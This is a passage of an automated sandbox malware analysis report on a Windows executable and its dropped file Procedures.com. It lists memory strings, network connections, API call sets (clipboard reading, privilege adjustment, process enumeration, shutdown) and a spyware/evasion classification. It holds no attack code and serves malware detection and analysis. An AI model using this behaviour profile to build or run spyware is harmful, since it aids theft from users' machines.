                Source: chrome.exe, 0000000F.00000003.2588677175.0000327001F04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2589259392.0000327001FBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2588635117.0000327001EE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2588251037.0000327001EA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
                Source: chrome.exe, 0000000F.00000003.2588251037.0000327001EA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
                Source: chrome.exe, 0000000F.00000003.2580577256.000032700169C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
                Source: chrome.exe, 0000000F.00000003.2550016717.00003270010D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=$
                Source: chrome.exe, 0000000F.00000003.2566486639.0000327000E84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
                Source: chrome.exe, 0000000F.00000003.2580577256.000032700169C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
                Source: chrome.exe, 0000000F.00000003.2580577256.000032700169C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
                Source: chrome.exe, 0000000F.00000003.2580577256.000032700169C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
                Source: chrome.exe, 0000000F.00000003.2566486639.0000327000E84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
                Source: chrome.exe, 0000000F.00000003.2566486639.0000327000E84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                Source: chrome.exe, 0000000F.00000003.2588635117.0000327001EE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
                Source: chrome.exe, 0000000F.00000003.2588677175.0000327001F04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2588458942.0000327001054000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2588501124.0000327001F34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2589259392.0000327001FBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2588635117.0000327001EE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
                Source: chrome.exe, 0000000F.00000003.2588635117.0000327001EE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2588251037.0000327001EA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp
                Source: chrome.exe, 0000000F.00000003.2588635117.0000327001EE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2588251037.0000327001EA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://www.iheart.com/podcast/
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://www.instagram.com
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://www.last.fm/
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://www.messenger.com
                Source: Procedures.com, 0000000B.00000002.3161172557.0000000006854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                Source: Procedures.com, 0000000B.00000002.3161172557.0000000006854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                Source: Procedures.com, 0000000B.00000002.3161172557.0000000006854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: Procedures.com, 0000000B.00000002.3161172557.0000000006854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: Procedures.com, 0000000B.00000002.3161172557.0000000006854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: Procedures.com, 0000000B.00000002.3161172557.0000000006854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: 2cc80dabc69f58b6_1.24.drString found in binary or memory: https://www.msn.com/web-notification-icon-light.png
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://www.office.com
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://www.tiktok.com/
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://www.youtube.com
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://y.music.163.com/m/
                Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
                Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
                Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
                Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
                Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
                Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
                Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
                Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
                Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
                Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
                Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
                Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
                Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
                Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
                Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
                Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
                Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
                Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
                Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
                Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
                Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
                Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
                Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49739 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 94.130.188.57:443 -> 192.168.2.5:49745 version: TLS 1.2
                Source: C:\Users\user\Desktop\trZG6pItZj.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E9F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,11_2_00E9F7C7
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E9F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,11_2_00E9F55C
                Source: C:\Users\user\Desktop\trZG6pItZj.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00EB9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,11_2_00EB9FD2
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E94763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,11_2_00E94763
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E81B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,11_2_00E81B4D
                Source: C:\Users\user\Desktop\trZG6pItZj.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_004038AF
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E8F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,11_2_00E8F20D
                Source: C:\Users\user\Desktop\trZG6pItZj.exeFile created: C:\Windows\AuditorBoostJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeFile created: C:\Windows\LifeSoxJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeFile created: C:\Windows\ReactionsReachJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeFile created: C:\Windows\RenoStruckJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeFile created: C:\Windows\LevyYuJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeFile created: C:\Windows\NlDistributorsJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeCode function: 0_2_0040737E0_2_0040737E
                Source: C:\Users\user\Desktop\trZG6pItZj.exeCode function: 0_2_00406EFE0_2_00406EFE
                Source: C:\Users\user\Desktop\trZG6pItZj.exeCode function: 0_2_004079A20_2_004079A2
                Source: C:\Users\user\Desktop\trZG6pItZj.exeCode function: 0_2_004049A80_2_004049A8
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E4801711_2_00E48017
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E2E1F011_2_00E2E1F0
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E3E14411_2_00E3E144
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E422A211_2_00E422A2
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E222AD11_2_00E222AD
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E5A26E11_2_00E5A26E
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E3C62411_2_00E3C624
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00EAC8A411_2_00EAC8A4
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E5E87F11_2_00E5E87F
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E56ADE11_2_00E56ADE
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E92A0511_2_00E92A05
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E88BFF11_2_00E88BFF
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E3CD7A11_2_00E3CD7A
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E4CE1011_2_00E4CE10
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E5715911_2_00E57159
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E2924011_2_00E29240
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00EB531111_2_00EB5311
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E296E011_2_00E296E0
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E4170411_2_00E41704
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E41A7611_2_00E41A76
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E47B8B11_2_00E47B8B
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E29B6011_2_00E29B60
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E47DBA11_2_00E47DBA
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E41D2011_2_00E41D20
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E41FE711_2_00E41FE7
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\139308\Procedures.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: String function: 00E40DA0 appears 46 times
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: String function: 00E3FD52 appears 40 times
                Source: C:\Users\user\Desktop\trZG6pItZj.exeCode function: String function: 004062CF appears 57 times
                Source: trZG6pItZj.exeStatic PE information: invalid certificate
                Source: trZG6pItZj.exe, 00000000.00000002.2081573085.00000000006BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs trZG6pItZj.exe
                Source: trZG6pItZj.exe, 00000000.00000003.2080977821.00000000006BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs trZG6pItZj.exe
                Source: trZG6pItZj.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@98/292@25/16
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E941FA GetLastError,FormatMessageW,11_2_00E941FA
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E82010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,11_2_00E82010
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E81A0B AdjustTokenPrivileges,CloseHandle,11_2_00E81A0B
                Source: C:\Users\user\Desktop\trZG6pItZj.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E8DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,11_2_00E8DD87
                Source: C:\Users\user\Desktop\trZG6pItZj.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E93A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,11_2_00E93A0E
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\FM5EQAV1.htmJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6584:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3360:120:WilError_03
                Source: C:\Users\user\Desktop\trZG6pItZj.exeFile created: C:\Users\user\AppData\Local\Temp\nssBE4E.tmpJump to behavior
                Source: trZG6pItZj.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Users\user\Desktop\trZG6pItZj.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\trZG6pItZj.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
